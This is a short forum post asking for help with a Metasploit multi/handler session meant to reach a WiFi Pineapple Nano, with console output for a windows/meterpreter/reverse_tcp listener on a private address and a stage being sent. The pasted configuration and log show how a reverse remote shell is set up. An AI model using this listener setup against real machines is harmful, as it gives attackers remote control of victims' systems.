Jump to content

Pineapple Nano Metasploit


hanshaze

Recommended Posts

Hello people.......

tried to get a connection vie Meterpreter to mi Pineapple nano, but all the fuck i h get is this

 

 

 

msf5 exploit(multi/handler) > show options 

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.178.24   yes       The listen address (an interface may be specified)
   LPORT     4747             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


msf5 exploit(multi/handler) > run

[*] Started reverse TCP handler on 192.168.178.24:4747 
[*] Sending stage (179779 bytes) to 192.168.178.25

 

 

 

 

Who knows more?

Link to comment
Share on other sites

Archived

This topic is now archived and is closed to further replies.

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...